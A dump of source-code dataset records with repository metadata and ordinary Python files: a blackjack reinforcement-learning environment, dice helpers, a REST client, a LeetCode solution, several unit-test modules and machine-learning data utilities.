Dataset schema (one column per field, one record per source file; nullable columns are marked):
- hexsha: string, length 40
- size: int64, 5 to 2.06M
- ext: string, 10 distinct values
- lang: string, 1 distinct value
- max_stars_repo_path: string, length 3 to 248
- max_stars_repo_name: string, length 5 to 125
- max_stars_repo_head_hexsha: string, length 40 to 78
- max_stars_repo_licenses: list, 1 to 10 items
- max_stars_count: int64, 1 to 191k, nullable
- max_stars_repo_stars_event_min_datetime: string, length 24, nullable
- max_stars_repo_stars_event_max_datetime: string, length 24, nullable
- max_issues_repo_path: string, length 3 to 248
- max_issues_repo_name: string, length 5 to 125
- max_issues_repo_head_hexsha: string, length 40 to 78
- max_issues_repo_licenses: list, 1 to 10 items
- max_issues_count: int64, 1 to 67k, nullable
- max_issues_repo_issues_event_min_datetime: string, length 24, nullable
- max_issues_repo_issues_event_max_datetime: string, length 24, nullable
- max_forks_repo_path: string, length 3 to 248
- max_forks_repo_name: string, length 5 to 125
- max_forks_repo_head_hexsha: string, length 40 to 78
- max_forks_repo_licenses: list, 1 to 10 items
- max_forks_count: int64, 1 to 105k, nullable
- max_forks_repo_forks_event_min_datetime: string, length 24, nullable
- max_forks_repo_forks_event_max_datetime: string, length 24, nullable
- content: string, length 5 to 2.06M
- avg_line_length: float64, 1 to 1.02M
- max_line_length: int64, 3 to 1.03M
- alphanum_fraction: float64, 0 to 1
- count_classes: int64, 0 to 1.6M
- score_classes: float64, 0 to 1
- count_generators: int64, 0 to 651k
- score_generators: float64, 0 to 1
- count_decorators: int64, 0 to 990k
- score_decorators: float64, 0 to 1
- count_async_functions: int64, 0 to 235k
- score_async_functions: float64, 0 to 1
- count_documentation: int64, 0 to 1.04M
- score_documentation: float64, 0 to 1

Each record below consists of a metadata header, the file content, and a closing stats line.
hexsha: bd4f544d8896cf4cc8569ba0288541ed6799028b | size: 6,058 | ext: py | lang: Python
repo: dwraft/gameRL @ 518b2a2d193220f7334584ccde5cf2ab318d718a | path: gameRL/game_simulators/blackjack.py | licenses: ["MIT"] (identical across the stars/issues/forks column groups)
max_stars_count: null | max_issues_count: null | max_forks_count: null
"""
Modeled largely after
https://github.com/openai/gym/blob/master/gym/envs/toy_text/blackjack.py
Also, the github version draws with replacement, while I modified to not use replacement
Also, reference here for how to play blackjack
"""
from typing import Dict, List, Tuple
import gym
import numpy as np
from gym import spaces
from gym.utils import seeding
SUITS = 4
CARD_VALUES = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 10, 10, 10]
DEALER_MAX = 17
class BlackjackDeck:
def __init__(self, N_decks: int, with_replacement=False):
self.N_decks = N_decks
self.deck = CARD_VALUES.copy() * SUITS * N_decks
self.with_replacement = with_replacement
def draw_card(self) -> int:
"""Draws and returns card from the deck"""
index = np.random.randint(len(self.deck))
if self.with_replacement:
return self.deck[index]
return self.deck.pop(index)
def is_empty(self) -> bool:
return not len(self.deck)
class BlackjackHand:
def __init__(self, blackjack_deck: BlackjackDeck, max_hand_sum: int = None):
self.max_hand_sum = max_hand_sum
self.blackjack_deck: BlackjackDeck = blackjack_deck
self.hand: List[int] = []
self._initial_draw()
def draw_card(self):
self.hand.append(self.blackjack_deck.draw_card())
def _initial_draw(self):
self.hand = []
for _ in range(2):
self.draw_card()
def has_usable_ace(self) -> bool:
return 1 in self.hand and sum(self.hand) + 10 <= self.max_hand_sum
def sum_hand(self) -> int:
if self.has_usable_ace():
return sum(self.hand) + 10
return sum(self.hand)
def is_bust(self) -> bool:
return sum(self.hand) > self.max_hand_sum
def score(self) -> int:
return 0 if self.is_bust() else self.sum_hand()
def is_natural(self) -> bool:
"""The optimal blackjack hand, eq"""
return sorted(self.hand) == [1, 10]
def __str__(self) -> str:
return f"Hand={self.hand} Score={self.score()}"
def __repr__(self) -> str:
return f"Hand={self.hand} Score={self.score()}"
@property
def hand_size(self) -> int:
return len(self.hand)
def is_double_down_legal(self) -> bool:
return self.hand_size == 2
class BlackjackCustomEnv(gym.Env):
def __init__(self, N_decks: int, natural_bonus: bool = True, max_hand_sum: int = 21,
simple_game: bool = False):
# actions: 0 = stick (stop where you are), 1 = hit (keep playing), and, unless simple_game, 2 = double down
self.max_hand_sum = max_hand_sum
self._simple_game = simple_game
self.action_space = spaces.Discrete(2 if simple_game else 3)
self.observation_space = spaces.MultiDiscrete([32, 11, 2])
self.N_decks = N_decks
self.seed()
# Flag to payout 1.5 on a "natural" blackjack win, like casino rules
# Ref: http://www.bicyclecards.com/how-to-play/blackjack/
self.natural_bonus = natural_bonus
# start the first game
self.reset()
def render(self) -> None:
print(f"Dealer State: {str(self.dealer)}\n Player State: {str(self.player)}")
def seed(self, seed=None):
self.np_random, seed = seeding.np_random(seed)
return [seed]
def _calculate_player_reward(self) -> int:
"""
Computes the player's reward in the case that neither busts
-1 for dealer > player, 0 for tie, 1 for player > dealer
"""
player_sum = self.player.score()
dealer_sum = self.dealer.score()
return (player_sum > dealer_sum) - (dealer_sum > player_sum)
def _hit(self) -> Tuple[bool, int]:
"""Handles case where the player chooses to hit"""
self.player.draw_card()
if self.player.is_bust():
done = True
reward = -1
else:
done = False
reward = 0
return done, reward
def _stick(self) -> Tuple[bool, int]:
"""Handles case where the player chooses to stick"""
done = True
while self.dealer.sum_hand() < DEALER_MAX:
self.dealer.draw_card()
reward = self._calculate_player_reward()
if self.natural_bonus and self.player.is_natural() and reward == 1:
reward = 1.5
return done, reward
def _double_down(self):
"""
Handles case where the player chooses to double down
If the double down is illegal, act as if the player tried to hit.
"""
# doubling down is only legal on the initial two-card hand (see is_double_down_legal)
multiplier = 2
if not self.player.is_double_down_legal():
return self._hit()
done, reward = self._hit()
# case where you went over
if done:
return done, multiplier * reward
_, reward = self._stick()
return True, multiplier * reward
def _get_info(self) -> Dict:
"""Return debugging info, for now just empty dictionary"""
return {}
def step(self, action) -> Tuple[Tuple, int, bool, dict]:
"""Action must be in the set {0,1}"""
assert self.action_space.contains(action)
# player hits
if action == 1:
done, reward = self._hit()
elif action == 0:
done, reward = self._stick()
elif action == 2 and not self._simple_game: # double down
done, reward = self._double_down()
else:
raise ValueError("Illegal action")
return self._get_obs(), reward, done, {}
def _get_obs(self) -> Tuple[int, int, bool]:
return (
self.player.sum_hand(),
self.dealer.hand[0],
self.player.has_usable_ace(),
)
def reset(self) -> Tuple[int, int, bool]:
self.blackjack_deck: BlackjackDeck = BlackjackDeck(self.N_decks)
self.dealer = BlackjackHand(self.blackjack_deck, self.max_hand_sum)
self.player = BlackjackHand(self.blackjack_deck, self.max_hand_sum)
return self._get_obs()
stats: avg_line_length=31.884211 | max_line_length=88 | alphanum_fraction=0.610432 | count_classes=5,603 | score_classes=0.924893 | count_generators=0 | score_generators=0 | count_decorators=71 | score_decorators=0.01172 | count_async_functions=0 | score_async_functions=0 | count_documentation=1,306 | score_documentation=0.215583
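
A minimal usage sketch for the environment defined in the file above (assuming the repository layout makes gameRL.game_simulators.blackjack importable and gym is installed); the loop follows the classic gym step API:

from gameRL.game_simulators.blackjack import BlackjackCustomEnv

env = BlackjackCustomEnv(N_decks=2)
obs = env.reset()
done = False
while not done:
    action = env.action_space.sample()  # random policy, just for illustration
    obs, reward, done, info = env.step(action)
env.render()
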
hexsha: bd503a6e6bd6d6f165fffc6aa8ef728aa475b171 | size: 228 | ext: py | lang: Python
repo: hugovk/dragn @ 8e6e3146c3a5980a384f4be5dc7019c10ab0bffe | path: dragn/dice/__init__.py | licenses: ["MIT"] (identical across the stars/issues/forks column groups)
max_stars_count: null | max_issues_count: null | max_forks_count: null
from functools import partial
from dragn.dice.die_and_roller import roller
D4 = partial(roller, 4)
D6 = partial(roller, 6)
D8 = partial(roller, 8)
D10 = partial(roller, 10)
D12 = partial(roller, 12)
D20 = partial(roller, 20)
stats: avg_line_length=19 | max_line_length=44 | alphanum_fraction=0.732456 | count_classes=0 | score_classes=0 | count_generators=0 | score_generators=0 | count_decorators=0 | score_decorators=0 | count_async_functions=0 | score_async_functions=0 | count_documentation=0 | score_documentation=0
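
The file above pre-binds die sizes with functools.partial. A self-contained sketch of the same pattern (the roll function here is a stand-in for illustration, not the real dragn roller):

import random
from functools import partial

def roll(sides: int) -> int:
    """Roll a single die with the given number of sides."""
    return random.randint(1, sides)

D6 = partial(roll, 6)
D20 = partial(roll, 20)
print(D6(), D20())
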
hexsha: bd50555970de3cea2bfe20e4fa5b5203c2dc67c1 | size: 472 | ext: py | lang: Python
repo: steinnes/apnscli @ 3573fb835fe71dcec1c1611eed8c5b73347f0157 | path: setup.py | licenses: ["MIT"] (identical across the stars/issues/forks column groups)
max_stars_count: 2 (2015-08-13T18:29:45.000Z to 2021-08-12T03:31:58.000Z) | max_issues_count: null | max_forks_count: null
from setuptools import setup
from pip.req import parse_requirements
from pip.download import PipSession
setup(
name='apnsend',
version='0.1',
description='apnsend is a tool to test your APNS certificate, key and token.',
py_modules=['apnsend'],
install_requires=[
str(req.req) for req in parse_requirements("requirements.txt", session=PipSession())
],
entry_points='''
[console_scripts]
apnsend=apnsend:main
''',
)
stats: avg_line_length=26.222222 | max_line_length=92 | alphanum_fraction=0.680085 | count_classes=0 | score_classes=0 | count_generators=0 | score_generators=0 | count_decorators=0 | score_decorators=0 | count_async_functions=0 | score_async_functions=0 | count_documentation=172 | score_documentation=0.364407
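
Note that pip.req and pip.download were removed from pip's internals in pip 10, so the install_requires trick above fails on modern pip. A sketch of the usual workaround, reading requirements.txt directly instead of going through pip internals (not part of the original project):

from setuptools import setup

with open("requirements.txt") as fh:
    requirements = [
        line.strip()
        for line in fh
        if line.strip() and not line.startswith("#")
    ]

setup(
    name="apnsend",
    version="0.1",
    description="apnsend is a tool to test your APNS certificate, key and token.",
    py_modules=["apnsend"],
    install_requires=requirements,
    entry_points="""
        [console_scripts]
        apnsend=apnsend:main
    """,
)
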
hexsha: bd5085ad69142965ca0cc325bce4a8b98430c865 | size: 7,159 | ext: py | lang: Python
repo: intenvy/down-to-earth @ 3d15366a47fe81ee895ba38c7f90a714b18a6c08 | path: down2earth/core/client.py | licenses: ["MIT"] (identical across the stars/issues/forks column groups)
max_stars_count: null | max_issues_count: null | max_forks_count: null
import json
from abc import ABC, abstractmethod
from typing import Optional
from aiohttp import ClientResponse as Response
from .mechanisms.fetch import IFetchMechanism
from .models.request import IRestRequest
from ..errors.fetching_errors import FetchMechanismFailed
from ..utils.logging_utils import IMonitorLogger, LogLevel
from ..utils.typing_utils import StringMapping, Json, JsonDictionary
def clean_request_params(params: JsonDictionary) -> StringMapping:
clean_params = {}
for key, value in params.items():
if value is not None:
clean_params[key] = str(value)
return clean_params
async def deserialize_response(response: Response) -> Optional[Json]:
content = await response.text()
if len(content) > 0:
try:
return json.loads(content)
except json.JSONDecodeError:
return dict(raw=content)
class IRestClient(ABC):
@property
@abstractmethod
def fetch_mechanism(self) -> IFetchMechanism:
pass
@abstractmethod
async def close(self) -> None:
pass
def _sign_payload(self, request: IRestRequest) -> None:
pass
def _on_response_received(self, request: IRestRequest, response: Response) -> None:
pass
def _on_mechanism_failure(self, request: IRestRequest) -> None:
pass
async def rest_call(self, request: IRestRequest, signed: bool = False) -> Response:
print('Making rest call')
mechanism = self.fetch_mechanism
if signed:
self._sign_payload(request)
try:
print('fetching response')
response = await mechanism.fetch(request)
self._on_response_received(request, response)
return response
except FetchMechanismFailed as e:
print('Error occurred')
print('error:', e.as_dict())
self._on_mechanism_failure(request)
class RestClient(IRestClient):
__slots__ = '_fetch_mechanism', '_logger'
def __init__(self, mechanism: IFetchMechanism, logger: IMonitorLogger):
self._fetch_mechanism: IFetchMechanism = mechanism
self._logger: IMonitorLogger = logger
@property
def fetch_mechanism(self) -> IFetchMechanism:
return self._fetch_mechanism
async def close(self) -> None:
await self._fetch_mechanism.close()
def _on_mechanism_failure(self, request: IRestRequest) -> None:
self._logger.log(LogLevel.ERROR, f'Fetch mechanism failed on {request.url}, Request:{request}')
def _on_response_received(self, request: IRestRequest, response: Response) -> None:
self._logger.log(LogLevel.ERROR, f'Response received from {request.url}, STATUS:{response.status}')
"""
class IRestClient(ABC):
def __init__(self, api_trace_log: bool = False, ssl_context: ssl.SSLContext = None) -> None:
self.api_trace_log = api_trace_log
self.rest_session = None
self.subscription_sets = []
if ssl_context is not None:
self.ssl_context = ssl_context
else:
self.ssl_context = ssl.create_default_context()
@abstractmethod
def _get_rest_api_uri(self, resource: str) -> str:
pass
@abstractmethod
def _sign_payload(self,
rest_call_type: RestCallType,
resource: str,
data: Optional[dict] = None,
params: Optional[dict] = None,
headers: Optional[dict] = None) -> None:
pass
@abstractmethod
def _on_response_received(self,
status_code: int,
headers: CIMultiDictProxy[str],
body: Optional[dict] = None) -> None:
pass
def rest_session(self) -> aiohttp.ClientSession:
pass
async def close(self) -> None:
session = self.rest_session()
if session is not None:
await session.close()
async def _fetch(self,
rest_call_type: RestCallType,
resource: str,
data: Optional[dict] = None,
params: Optional[dict] = None,
headers: Optional[dict] = None) -> aiohttp.ClientResponse:
call = self.rest_session().request(
rest_call_type.value,
self._get_rest_api_uri(resource),
json=data,
params=params,
headers=headers,
ssl=self.ssl_context
)
async with call as response:
status_code = response.status
if 300 > status_code >= 200:
return response
async def _make_rest_call(self, rest_call_type: RestCallType, resource: str, data: dict = None,
params: dict = None, headers: dict = None, signed: bool = False) -> dict:
# ensure headers is always a valid object
if headers is None:
headers = {}
# add signature into the parameters
if signed:
self._sign_payload(rest_call_type, resource, data, params, headers)
# fetch the response
response = await self._fetch(rest_call_type, resource, data=data, params=params, headers=headers)
status_code = response.status
headers = response.headers
body = await response.text()
if len(body) > 0:
try:
body = json.loads(body)
except json.JSONDecodeError:
body = dict(raw=body)
self._on_response_received(status_code, headers, body)
return dict(status_code=status_code, headers=headers, response=body)
def rest_session(self) -> aiohttp.ClientSession:
if self.rest_session is not None:
return self.rest_session
if self.api_trace_log:
trace_config = aiohttp.TraceConfig()
trace_config.on_request_start.append(CryptoXLibClient._on_request_start)
trace_config.on_request_end.append(CryptoXLibClient._on_request_end)
trace_configs = [trace_config]
else:
trace_configs = None
self.rest_session = aiohttp.ClientSession(trace_configs=trace_configs)
return self.rest_session
@staticmethod
def clean_request_params(params: dict) -> dict:
clean_params = {}
for key, value in params.items():
if value is not None:
clean_params[key] = str(value)
return clean_params
@staticmethod
async def _on_request_start(session, trace_config_ctx, params) -> None:
LOG.debug(f'> Context: {trace_config_ctx}')
LOG.debug(f'> Params: {params}')
@staticmethod
async def _on_request_end(session, trace_config_ctx, params) -> None:
LOG.debug(f'< Context: {trace_config_ctx}')
LOG.debug(f'< Params: {params}')
@staticmethod
def _get_current_timestamp_ms() -> int:
return int(datetime.datetime.now(tz=datetime.timezone.utc).timestamp() * 1000)
@staticmethod
def _get_unix_timestamp_ns() -> int:
return int(time.time_ns() * 10 ** 9)
"""
stats: avg_line_length=33.297674 | max_line_length=107 | alphanum_fraction=0.624808 | count_classes=1,840 | score_classes=0.257019 | count_generators=0 | score_generators=0 | count_decorators=251 | score_decorators=0.035061 | count_async_functions=949 | score_async_functions=0.13256 | count_documentation=4,641 | score_documentation=0.648275
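
A quick sketch of how clean_request_params from the module above normalizes query parameters before a request is sent (assuming the package layout makes down2earth.core.client importable; the parameter values are made up):

from down2earth.core.client import clean_request_params

params = {"symbol": "BTCUSD", "limit": 100, "cursor": None}
print(clean_request_params(params))  # {'symbol': 'BTCUSD', 'limit': '100'}
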
hexsha: bd55c1befc97ceb37b6df37eb99994c9d21b2ba9 | size: 773 | ext: py | lang: Python
path: python/206.reverse-linked-list.py | head: eb7f2fb142b8a30d987c5ac8002a96ead0aa56f4 | licenses: ["MIT"]
max_stars_repo_name: Wanger-SJTU/leetcode-solutions | max_stars_count: 2 (2019-05-13T17:09:15.000Z to 2019-09-08T15:32:42.000Z)
max_issues_repo_name and max_forks_repo_name: Wanger-SJTU/leetcode | max_issues_count: null | max_forks_count: null
#
# @lc app=leetcode id=206 lang=python3
#
# [206] Reverse Linked List
#
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution:
def reverseList(self, head: ListNode) -> ListNode:
def iterative(head):
pre,cur = None, head
while cur:
nxt = cur.next
cur.next = pre
pre = cur
cur = nxt
return pre
def recursively(head):
if not head or not head.next:
return head
node = recursively(head.next)
head.next.next = head
head.next = None
return node
return iterative(head)
stats: avg_line_length=23.424242 | max_line_length=54 | alphanum_fraction=0.500647 | count_classes=563 | score_classes=0.728331 | count_generators=0 | score_generators=0 | count_decorators=0 | score_decorators=0 | count_async_functions=0 | score_async_functions=0 | count_documentation=197 | score_documentation=0.254851
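
A small driver for the solution above. ListNode is only sketched in the comment block of the original file, so it is defined here the way LeetCode defines it (it must be in scope before the Solution class for the annotations to resolve):

class ListNode:
    def __init__(self, x):
        self.val = x
        self.next = None

def build_list(values):
    """Build a singly linked list from a Python list and return its head."""
    head = current = ListNode(values[0])
    for value in values[1:]:
        current.next = ListNode(value)
        current = current.next
    return head

head = build_list([1, 2, 3, 4, 5])
node = Solution().reverseList(head)
while node:
    print(node.val, end=" ")  # prints: 5 4 3 2 1
    node = node.next
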
hexsha: 1f9c7aa01ba17d2af64bca27a27081040ab187d0 | size: 2,521 | ext: py | lang: Python
repo: GrAndSE/lighty-template @ 63834fbb2421506205745bb596ff8ac726361f2a | path: tests/default_tags.py | licenses: ["BSD-3-Clause"] (identical across the stars/issues/forks column groups)
max_stars_count: 1 (2018-05-09T19:56:15.000Z) | max_issues_count: null | max_forks_count: null
'''Module to test default template tags such as if, for, with, include, etc.
'''
import unittest
from lighty.templates import Template
from lighty.templates.loaders import FSLoader
class DefaultTagsTestCase(unittest.TestCase):
"""Test case for if template tag
"""
def assertResult(self, name, result, value):
assert result == value, 'Error on tag "%s" applying to: %s' % (
name, ' '.join((str(result), 'except', str(value))))
def testSpacelless(self):
'''Test spaceless template tag'''
template = Template()
template.parse('''{% spaceless %}
Some
broken
text
{% endspaceless %}''')
result = template({})
right = 'Some broken text'
assert result == right, 'Spaceless tag error:\n%s' % (
"\n".join(result, 'except', right))
def testSimpleWith(self):
'''Test with template tag'''
template = Template()
template.parse('{% with user.name as name %}{{ name }}{% endwith %}')
result = template({'user': {'name': 'John'}})
self.assertResult('with', result.strip(), 'John')
def testSimpleIf(self):
'''Test if template tag'''
template = Template()
template.parse('{% if a %}Foo{% endif %}')
result = template({'a': 1})
self.assertResult('if', result.strip(), 'Foo')
result = template({'a': 0})
self.assertResult('if', result.strip(), '')
def testSimpleFor(self):
'''Test for template tag'''
template = Template()
template.parse('{% for a in list %}{{ a }} {% endfor %}')
result = template({'list': [1, 2, 3, 4, 5]})
self.assertResult('for', result.strip(), '1 2 3 4 5')
def testSimpleInclude(self):
'''Test include template tag'''
template = Template('{% include "simple.html" %}', name="test.html",
loader=FSLoader(['tests/templates']))
result = template({'name': 'Peter'})
self.assertResult('include', result.strip(), 'Hello, Peter')
def test():
suite = unittest.TestSuite()
suite.addTest(DefaultTagsTestCase('testSpacelless'))
suite.addTest(DefaultTagsTestCase('testSimpleWith'))
suite.addTest(DefaultTagsTestCase('testSimpleIf'))
suite.addTest(DefaultTagsTestCase('testSimpleFor'))
suite.addTest(DefaultTagsTestCase('testSimpleInclude'))
return suite
stats: avg_line_length=36.536232 | max_line_length=79 | alphanum_fraction=0.568029 | count_classes=1,987 | score_classes=0.788179 | count_generators=0 | score_generators=0 | count_decorators=0 | score_decorators=0 | count_async_functions=0 | score_async_functions=0 | count_documentation=880 | score_documentation=0.349068
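
A short sketch of running the suite defined above with the standard unittest runner (assuming the test module is executed directly, so suite() is in scope):

import unittest

if __name__ == "__main__":
    unittest.TextTestRunner(verbosity=2).run(suite())
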
hexsha: 1f9c9104d3d243f4e10cfdbb1fb0326c74424885 | size: 3,038 | ext: py | lang: Python
repo: SoyGema/NannyML @ 323ff404e0e06c479b01d2a63c1c3af9680d95ab | path: tests/test_calibration.py | licenses: ["Apache-2.0"] (identical across the stars/issues/forks column groups)
max_stars_count: null | max_issues_count: null | max_forks_count: null
# Author: Niels Nuyttens <[email protected]>
#
# License: Apache Software License 2.0
"""Unit tests for the calibration module."""
import numpy as np
import pandas as pd
import pytest
from nannyml.calibration import IsotonicCalibrator, _get_bin_index_edges, needs_calibration
from nannyml.exceptions import InvalidArgumentsException
@pytest.mark.parametrize('vector_size,bin_count', [(0, 0), (0, 1), (1, 1), (2, 1), (3, 5)])
def test_get_bin_edges_raises_invalid_arguments_exception_when_given_too_few_samples( # noqa: D103
vector_size, bin_count
):
with pytest.raises(InvalidArgumentsException):
_ = _get_bin_index_edges(vector_size, bin_count)
@pytest.mark.parametrize(
'vector_length,bin_count,edges',
[
(20, 4, [(0, 5), (5, 10), (10, 15), (15, 20)]),
(10, 3, [(0, 3), (3, 6), (6, 10)]),
],
)
def test_get_bin_edges_works_correctly(vector_length, bin_count, edges): # noqa: D103
sut = _get_bin_index_edges(vector_length, bin_count)
assert len(sut) == len(edges)
assert sorted(sut) == sorted(edges)
def test_needs_calibration_returns_false_when_calibration_does_not_always_improves_ece(): # noqa: D103
y_true = pd.Series([0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1])
y_pred_proba = y_true
shuffled_indexes = np.random.permutation(len(y_true))
y_true, y_pred_proba = y_true[shuffled_indexes], y_pred_proba[shuffled_indexes]
sut = needs_calibration(y_true, y_pred_proba, IsotonicCalibrator(), bin_count=2, split_count=3)
assert not sut
def test_needs_calibration_returns_true_when_calibration_always_improves_ece(): # noqa: D103
y_true = pd.Series([0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1])
y_pred_proba = abs(1 - y_true)
shuffled_indexes = np.random.permutation(len(y_true))
y_true, y_pred_proba = y_true[shuffled_indexes], y_pred_proba[shuffled_indexes]
sut = needs_calibration(y_true, y_pred_proba, IsotonicCalibrator())
assert sut
def test_needs_calibration_raises_invalid_args_exception_when_y_true_contains_nan(): # noqa: D103
y_true = pd.Series([0, 0, 0, 0, 0, np.NaN, 1, 1, 1, 1, 1, 1])
y_pred_proba = np.asarray([0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1])
with pytest.raises(InvalidArgumentsException, match='target values contain NaN.'):
_ = needs_calibration(y_true, y_pred_proba, IsotonicCalibrator())
def test_needs_calibration_raises_invalid_args_exception_when_y_pred_proba_contains_nan(): # noqa: D103
y_true = pd.Series([0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1])
y_pred_proba = pd.Series(np.asarray([0, 0, 0, np.NaN, 0, 0, 1, 1, 1, 1, 1, 1]))
with pytest.raises(InvalidArgumentsException, match='predicted probabilities contain NaN.'):
_ = needs_calibration(y_true, y_pred_proba, IsotonicCalibrator())
def test_needs_calibration_returns_false_when_roc_auc_score_equals_one(): # noqa: D103
y_true = pd.Series([0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1])
y_pred_proba = y_true
sut = needs_calibration(y_true, y_pred_proba, IsotonicCalibrator())
assert sut is False
stats: avg_line_length=41.616438 | max_line_length=104 | alphanum_fraction=0.71264 | count_classes=0 | score_classes=0 | count_generators=0 | score_generators=0 | count_decorators=725 | score_decorators=0.238644 | count_async_functions=0 | score_async_functions=0 | count_documentation=336 | score_documentation=0.110599
hexsha: 1f9d448358740aaa0c055882926c57c97ff59db8 | size: 3,962 | ext: py | lang: Python
repo: liudaizong/IA-Net @ f19295d13d1468eb582521131cde3de83dfd18f6 | path: code/utils.py | licenses: ["MIT"] (identical across the stars/issues/forks column groups)
max_stars_count: 4 (2021-11-02T10:57:12.000Z to 2022-02-13T17:53:03.000Z) | max_issues_count: null | max_forks_count: null
import copy
import nltk
import json
from gensim.models import KeyedVectors
import h5py
import numpy as np
from torch import nn
def clones(module, N):
return nn.ModuleList([copy.deepcopy(module) for _ in range(N)])
def load_feature(filename, dataset='ActivityNet'):
if dataset == 'ActivityNet':
with h5py.File(filename, 'r') as fr:
return np.asarray(fr['feature']).astype(np.float32)
elif dataset == 'TACOS':
return np.load(filename).astype(np.float32)
elif dataset == 'Charades':
return np.load(filename).astype(np.float32)
elif dataset == 'Didemo':
with h5py.File(filename, 'r') as fr:
return np.asarray(fr['feature']).astype(np.float32)
return None
def load_json(filename):
with open(filename, encoding='utf8') as fr:
return json.load(fr)
def load_word2vec(filename, binary=True):
word2vec = KeyedVectors.load_word2vec_format(filename, binary=binary)
return word2vec
def tokenize(sentence, word2vec):
punctuations = ['.', '?', ',', '', '(', ')']
raw_text = sentence.lower()
words = nltk.word_tokenize(raw_text)
words = [word for word in words if word not in punctuations]
return [word for word in words if word in word2vec]
def generate_anchors(dataset='ActivityNet'):
if dataset == 'ActivityNet':
widths = np.array([16, 32, 64, 96, 128, 160, 192])
center = 7.5
start = center - 0.5 * (widths - 1)
end = center + 0.5 * (widths - 1)
elif dataset == 'TACOS':
widths = np.array([8, 16, 32, 64])#np.array([6, 18, 32])
center = 7.5
start = center - 0.125 * (widths - 1)
end = center + 0.125 * (widths - 1)
elif dataset == 'Didemo':
widths = np.array([8, 16, 32, 64])#np.array([6, 18, 32])
center = 7.5
start = center - 0.125 * (widths - 1)
end = center + 0.125 * (widths - 1)
elif dataset == 'Charades':
widths = np.array([16, 24, 32, 40])#np.array([6, 18, 32])
center = 7.5
start = center - 0.125 * (widths - 1)
end = center + 0.125 * (widths - 1)
else:
return None
return np.stack([start, end], -1)
import time
class CountMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = np.zeros([2, 4],dtype=np.float32)
self.count = 0
def update(self, val, n=1):
self.val += val
self.count += n
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
class TimeMeter(object):
"""Computes the average occurrence of some event per second"""
def __init__(self, init=0):
self.reset(init)
def reset(self, init=0):
self.init = init
self.start = time.time()
self.n = 0
def update(self, val=1):
self.n += val
@property
def avg(self):
return self.n / self.elapsed_time
@property
def elapsed_time(self):
return self.init + (time.time() - self.start)
class StopwatchMeter(object):
"""Computes the sum/avg duration of some event in seconds"""
def __init__(self):
self.reset()
def start(self):
self.start_time = time.time()
def stop(self, n=1):
if self.start_time is not None:
delta = time.time() - self.start_time
self.sum += delta
self.n += n
self.start_time = None
def reset(self):
self.sum = 0
self.n = 0
self.start_time = None
@property
def avg(self):
return self.sum / self.n
stats: avg_line_length=25.397436 | max_line_length=73 | alphanum_fraction=0.579253 | count_classes=1,746 | score_classes=0.440687 | count_generators=0 | score_generators=0 | count_decorators=222 | score_decorators=0.056032 | count_async_functions=0 | score_async_functions=0 | count_documentation=447 | score_documentation=0.112822
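
A short sketch of how the meters above are typically used in a training loop (assuming code/ is on the import path so they can be imported from utils; the loss values are made up):

from utils import AverageMeter, TimeMeter

losses = AverageMeter()
timer = TimeMeter()
for step, batch_loss in enumerate([0.9, 0.7, 0.6], start=1):
    losses.update(batch_loss, n=32)  # n is the batch size
    timer.update()
print(f"avg loss={losses.avg:.3f}, steps/sec={timer.avg:.2f}")
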
hexsha: 1f9e4501c0a3ac77cc15f6de9e5e460d7fd997df | size: 2,654 | ext: py | lang: Python
repo: bitmazk/django-aps-purchasing @ ff0316f0eaff5bd39ae40aaa861543d125f33dae | path: aps_purchasing/tests/forms_tests.py | licenses: ["MIT"] (identical across the stars/issues/forks column groups)
max_stars_count: 4 (2015-05-18T13:51:16.000Z to 2015-05-18T14:47:32.000Z) | max_issues_count: null | max_forks_count: null
"""Tests for the forms of the ``aps_purchasing`` app."""
import os
from django.conf import settings
from django.core.files.uploadedfile import SimpleUploadedFile
from django.test import TestCase
from django.utils.timezone import now
from ..forms import QuotationUploadForm
from ..models import MPN, Price, Quotation, QuotationItem
from .factories import (
CurrencyFactory,
DistributorFactory,
ManufacturerFactory,
)
class QuotationUploadFormTestCase(TestCase):
"""Tests for the ``QuotationUpoadForm`` form class."""
longMessage = True
def setUp(self):
self.distributor = DistributorFactory()
self.quotation_file = open(os.path.join(
settings.APP_ROOT, 'tests/files/Quotation.csv'))
self.data = {
'distributor': self.distributor.pk,
'ref_number': 'REF123',
'issuance_date': now(),
'expiry_date': now(),
'is_completed': True,
}
self.files = {
'quotation_file': SimpleUploadedFile('Quotation.csv',
self.quotation_file.read()),
}
def test_form(self):
form = QuotationUploadForm(data=self.data)
self.assertFalse(form.is_valid(), msg='The form should not be valid.')
form = QuotationUploadForm(data=self.data, files=self.files)
self.assertFalse(form.is_valid(), msg=(
'Without all the currencies in the DB, the form should not be'
' valid.'))
self.usd = CurrencyFactory(iso_code='USD')
form = QuotationUploadForm(data=self.data, files=self.files)
self.assertFalse(form.is_valid(), msg=(
'Without all the manufacturers in the DB, the form should not be'
' valid.'))
ManufacturerFactory(name='Samsung')
ManufacturerFactory(name='TDK')
form = QuotationUploadForm(data=self.data, files=self.files)
self.assertTrue(form.is_valid(), msg=(
'The form should be valid. Errors: {0}'.format(form.errors)))
form.save()
self.assertEqual(Quotation.objects.count(), 1, msg=(
'After form save, there should be one Quotation in the database.'))
self.assertEqual(QuotationItem.objects.count(), 2, msg=(
'After form save, there should be two QuotationItems in the'
' database.'))
self.assertEqual(Price.objects.count(), 4, msg=(
'After form save, there should be four Prices in the database.'))
self.assertEqual(MPN.objects.count(), 2, msg=(
'After form save, there should be two new MPNs in the database.'))
stats: avg_line_length=37.380282 | max_line_length=79 | alphanum_fraction=0.629239 | count_classes=2,221 | score_classes=0.83685 | count_generators=0 | score_generators=0 | count_decorators=0 | score_decorators=0 | count_async_functions=0 | score_async_functions=0 | count_documentation=742 | score_documentation=0.279578
hexsha: 1f9eb8e2438d5e8851abb15909ddab5b70595c79 | size: 1,839 | ext: py | lang: Python
